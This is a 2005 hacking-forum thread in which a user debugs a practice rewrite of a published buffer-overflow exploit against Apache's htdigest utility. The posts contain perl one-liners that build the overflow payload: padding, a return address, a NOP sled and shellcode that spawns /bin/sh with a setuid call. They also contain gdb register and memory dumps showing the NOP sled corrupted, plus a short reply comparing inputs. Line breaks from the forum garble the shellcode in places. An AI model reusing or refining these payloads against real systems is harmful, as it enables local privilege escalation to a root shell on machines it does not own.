 | |
| |||||||
| Home | Register | Projects | Blogs | FAQ | Calendar | Search | Today's Posts | Mark Forums Read | Free Directory | Free DNSReport | Tags |
| Notices |
| Hacking Discuss the art of hacking, your experiences, etc... |
First exploit coding stack corruptionThis is a discussion on "First exploit coding stack corruption" within the Hacking part of the Computer Security: Discussions section; Hi All, my stack's going a bit wierd. I'm re-writing the htdigest exploit ( http://seclists.org/lists/bugtraq/2005/May/0154.html ) as a practice. Anyway I do this [root@localhost bin]# ./htdigest ./hohi `perl -e 'print &... |
 |
| | LinkBack | Thread Tools | Display Modes |
22-10-05
| |||
| |||
 First exploit coding stack corruption Hi All, my stack's going a bit wierd. I'm re-writing the htdigest exploit (http://seclists.org/lists/bugtraq/2005/May/0154.html) as a practice. Anyway I do this [root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x41"x286 .. "\xe9\xfb\xff\xbf" . "\x90"x30 . "x31\xdb\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x 0c\xb0\x0b\x8d\x4b \x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x 62\x69\x6e\x2f\x73 \x68"'` user I get the following stack output ecx 0x8050d28 134548776 edx 0x22d9 8921 ebx 0x41414141 1094795585 esp 0xbfffee50 0xbfffee50 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x10286 66182 cs 0x23 35 ss 0x2b 43 ds 0xc010002b -1072693205 es 0x2b 43 before on exactly the same buffer but without shellcode i had control of EIP, but when i added the shellcode i suddenly end up having EIP full of AAAA's , perhaps I jumped to the wrong address, but in the address i jumped to i have a nopsled and all these 0xc2's which i don't think should be there. Any ideas? (gdb) x/bx 0xbffffbe9 0xbffffbe9: 0xc2 (gdb) 0xbffffbea: 0x90 (gdb) 0xbffffbeb: 0xc2 (gdb) 0xbffffbec: 0x90 (gdb) 0xbffffbed: 0xc2  |
| Sponsor | ||
| ||
| |
|
22-10-05
| |||
| |||
| dropped the \x41 for a nopsled to fill the buffer but the nopsled seems to corrupt ,or at least it is'nt a nopsled anymore. but I know my problem, and now I'm hitting the nopsled. I am with the program now and know what we are looking for in the structure. but the nopsled is corrupt, or at least it is'nt a nopsled anymore. maximumbuffer(NOP's) - strlen(shellcode) - 4, structure [nopsssssssssssss][shellcode][retaddr] [root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x90"x269 .. "\x31\xc0\xb0\x46\x31\xc9\xcd\x80\x80\xeb\x16\5b\x 31\xc0\x88\x43\x07 \x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x 53\x0c\xcd\x80\xe8 \xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x 41\x41\x41\x42\x42 \x42\x42" . "\xc0\xfb\xff\xbf\x45"'` user new info reg ebx 0x90c290c2 -1866297150 esp 0xbfffdbf0 0xbfffdbf0 ebp 0x90c290c2 0x90c290c2 esi 0x90c290c2 -1866297150 edi 0x90c290c2 -1866297150 eip 0x90c290c2 0x90c290c2 this is no nopsled but we are in the right place, i think. (gdb) x/bx 0xbffffbc0 0xbffffbc0: 0xc2 (gdb) 0xbffffbc1: 0x90 (gdb) 0xbffffbc2: 0xc2 (gdb) 0xbffffbc3: 0x90 (gdb) 0xbffffbc4: 0xc2 I tried again to find it using objdump but no luck [root@localhost bin]# objdump -s core.1888 | grep "90909090" Where's my nopsled?? |
|
24-10-05
| |||
| |||
| EDIT definately very wierd I dont really know what is the problem. What I do know is that when you use \x90 its putting 2 bytes on the stack at the moment that you use \x90 in stead of \x41 you have to have twice more \x41 as when you use \x90 htdigest ./pikah `perl -e 'print "\x90"x163'` user Adding user ������������������������������������ in realm �������������������������������������������������� �������������������������� �������������������������������������������������� �������������������������� ������������ New password: Re-type new password: Segmentation fault (core dumped) htdigest ./pikah `perl -e 'print "\x41"x163'` user Adding user user in realm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA New password: Re-type new password: (no core dump) |
| Sponsor | ||
| ||
| |
|
| | |
| coding, corruption, exploit, first, stack | |
| Thread Tools | |
| Display Modes | |
Linear Mode
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| PMSoftware Remote windowz root Exploit version 2 | Private | 20 | 2 Weeks Ago 05:31 | |
| Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) | Heap | Public | 0 | 13-02-08 15:48 |
| Mercury imap4 remote BOF exploit | 0day | 9 | 25-01-08 08:36 | |
| jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow Exploit | Heap | Public | 0 | 20-12-07 03:16 |
| Mercury imap4 server remote buffer overflow exploit | Deumas-1 | Public | 1 | 24-09-05 12:29 |
